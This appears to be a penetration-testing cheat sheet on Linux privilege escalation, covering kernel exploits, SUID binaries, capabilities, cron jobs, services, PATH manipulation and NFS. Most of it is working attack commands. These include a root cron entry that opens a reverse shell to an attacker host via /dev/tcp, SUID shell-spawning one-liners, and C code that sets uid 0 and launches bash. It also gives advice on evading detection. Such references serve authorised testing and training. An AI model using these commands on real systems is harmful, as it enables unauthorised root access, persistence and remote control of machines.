Linux Privilege Escalation

Overview

Privilege escalation in Linux involves techniques to gain higher-level access to a system, typically from a normal user to root access.

Kernel Exploits

1. Kernel Information

# Kernel Version
uname -a
cat /proc/version
dmesg | grep Linux

# Kernel Modules
lsmod
cat /proc/modules

2. Exploit Search

# Search for Exploits
searchsploit <kernel_version>
exploit-db.com
github.com

# Compile and Run
gcc exploit.c -o exploit
chmod +x exploit
./exploit

SUID/SGID Binaries

1. Find SUID/SGID Files

# Find SUID Files
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null

# Find SGID Files
find / -type f -perm -2000 2>/dev/null
find / -type f -perm -g=s 2>/dev/null

2. Common SUID/SGID Exploits

# GTFOBins
# https://gtfobins.github.io/

# Example: Using find
find / -name file -exec /bin/sh -p \;

# Example: Using vim
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

Capabilities

1. Check Capabilities

# List Capabilities
getcap -r / 2>/dev/null

# Common Capabilities
cap_setuid
cap_setgid
cap_net_bind_service

2. Exploit Capabilities

# Example: Using cap_setuid
setcap cap_setuid+ep /path/to/binary

Cron Jobs

1. Check Cron Jobs

# List Cron Jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab

# Check Cron Directories
ls -la /etc/cron.d
ls -la /etc/cron.daily
ls -la /etc/cron.hourly
ls -la /etc/cron.monthly
ls -la /etc/cron.weekly

2. Exploit Cron Jobs

# Create Reverse Shell
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > /etc/cron.d/root

Services

1. Check Services

# List Services
systemctl list-units --type=service
service --status-all
ps aux | grep root

# Check Service Permissions
ls -la /etc/init.d/
ls -la /etc/systemd/system/

2. Exploit Services

# Modify Service
systemctl edit <service>
systemctl daemon-reload
systemctl restart <service>

Environment Variables

1. Check Environment

# List Environment Variables
env
set
printenv

# Check PATH
echo $PATH

2. Exploit Environment

# PATH Manipulation
export PATH=/tmp:$PATH
echo 'int main(){setuid(0);system("/bin/bash");}' > /tmp/suid.c
gcc /tmp/suid.c -o /tmp/suid
chmod +s /tmp/suid

NFS

1. Check NFS

# List NFS Shares
showmount -e <target>
cat /etc/exports

# Mount NFS
mount -t nfs <target>:/share /mnt

2. Exploit NFS

# Create SUID Binary
echo 'int main(){setuid(0);system("/bin/bash");}' > /mnt/suid.c
gcc /mnt/suid.c -o /mnt/suid
chmod +s /mnt/suid

Tools

1. Primary Tools

• LinPEAS

• LinEnum

• Linux Exploit Suggester

• GTFOBins

• Metasploit

2. Additional Tools

• Pspy

• Pspy64

• Linux Smart Enumeration

• BeRoot

• Unix Privesc Check

Best Practices

1. Escalation Strategy

• Start with automated tools

• Check common vectors

• Document findings

• Test exploits safely

• Follow engagement scope

2. OPSEC Considerations

• Use stealth techniques

• Avoid detection

• Monitor for alerts

• Use legitimate tools

• Follow engagement scope

Resources

• GTFOBins

• HackTricks Linux Privesc

• PayloadsAllTheThings

• Linux Exploit Suggester

---

Last Updated: 2025-03-2